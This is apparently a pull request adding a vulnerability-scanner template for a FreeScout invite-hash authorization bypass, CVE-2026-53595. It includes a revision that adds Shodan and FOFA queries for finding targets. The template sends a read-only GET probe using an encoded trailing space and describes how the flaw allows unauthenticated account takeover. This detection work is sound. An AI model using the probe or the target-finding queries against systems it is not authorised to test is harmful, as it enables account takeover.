### PR TITLE
Add CVE-2026-53595 template

### DIFF
--- a/http/cves/2026/CVE-2026-53595.yaml
+++ b/http/cves/2026/CVE-2026-53595.yaml
@@ -1,0 +1,53 @@
+id: CVE-2026-53595
+
+info:
+  name: FreeScout < 1.8.224 - Invite Hash Authorization Bypass
+  author: str4k3r
+  severity: critical
+  description: |
+    FreeScout before 1.8.224 compares the invite_hash column using default
+    MySQL/MariaDB VARCHAR semantics. After an invited account is activated,
+    its empty hash compares equal to a trailing-space value supplied in the
+    public user-setup URL. This read-only probe submits one encoded space and
+    matches the real setup wizard rather than changing a password or account.
+    It requires an activated invitation on the target, as does the underlying
+    account-selection flaw.
+  impact: An unauthenticated attacker can reach an existing activated account's setup flow and take over the account.
+  remediation: Upgrade FreeScout to 1.8.224 or later.
+  reference:
+    - https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-jqj5-r72v-v29g
+    - https://github.com/freescout-help-desk/freescout/commit/c4688c31
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-53595
+  classification:
+    cve-id: CVE-2026-53595
+    cwe-id: CWE-289
+    cvss-score: 9.4
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: freescout-help-desk
+    product: freescout
+    technology: PHP, Laravel, MySQL
+  tags: cve,cve2026,freescout,helpdesk,laravel,authbypass,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/user-setup/%20/9999999999"
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - 'name="password_confirmation"'
+          - 'User Setup Wizard'
+        condition: and
+      - type: word
+        part: body
+        words:
+          - 'No invite was found'
+        negative: true

--- a/http/cves/2026/CVE-2026-53595.yaml
+++ b/http/cves/2026/CVE-2026-53595.yaml
@@ -5,15 +5,11 @@ info:
   author: str4k3r
   severity: critical
   description: |
-    FreeScout before 1.8.224 compares the invite_hash column using default
-    MySQL/MariaDB VARCHAR semantics. After an invited account is activated,
-    its empty hash compares equal to a trailing-space value supplied in the
-    public user-setup URL. This read-only probe submits one encoded space and
-    matches the real setup wizard rather than changing a password or account.
-    It requires an activated invitation on the target, as does the underlying
-    account-selection flaw.
-  impact: An unauthenticated attacker can reach an existing activated account's setup flow and take over the account.
-  remediation: Upgrade FreeScout to 1.8.224 or later.
+    FreeScout prior to 1.8.224 contains an authentication bypass caused by improper invite_hash handling and decryption failure in user setup endpoint, letting anonymous attackers reset credentials and log in as the lowest-id activated user, exploit requires no authentication.
+  impact: |
+    Anonymous attackers can reset email and password of the lowest-id activated user, gaining full access including administrator privileges.
+  remediation: |
+    Upgrade to version 1.8.224 or later.
   reference:
     - https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-jqj5-r72v-v29g
     - https://github.com/freescout-help-desk/freescout/commit/c4688c31
@@ -28,26 +24,20 @@ info:
     max-request: 1
     vendor: freescout-help-desk
     product: freescout
-    technology: PHP, Laravel, MySQL
+    shodan-query: http.title:"FreeScout"
+    fofa-query: title="FreeScout" || body="freescout"
   tags: cve,cve2026,freescout,helpdesk,laravel,authbypass,unauth
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/user-setup/%20/9999999999"
-    matchers-condition: and
+  - raw:
+      - |
+        GET /user-setup/%20/9999999999 HTTP/1.1
+        Host: {{Hostname}}
+
     matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        part: body
-        words:
-          - 'name="password_confirmation"'
-          - 'User Setup Wizard'
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains_all(body, "name=\"password_confirmation\"", "User Setup Wizard")'
+          - '!contains(body, "No invite was found")'
         condition: and
-      - type: word
-        part: body
-        words:
-          - 'No invite was found'
-        negative: true


### PR DESCRIPTION
## Verification

The template checks FreeScout's trailing-space invite-hash authorization flaw
with a GET-only request. It requires an activated invitation on the target and
does not submit a password or change account state.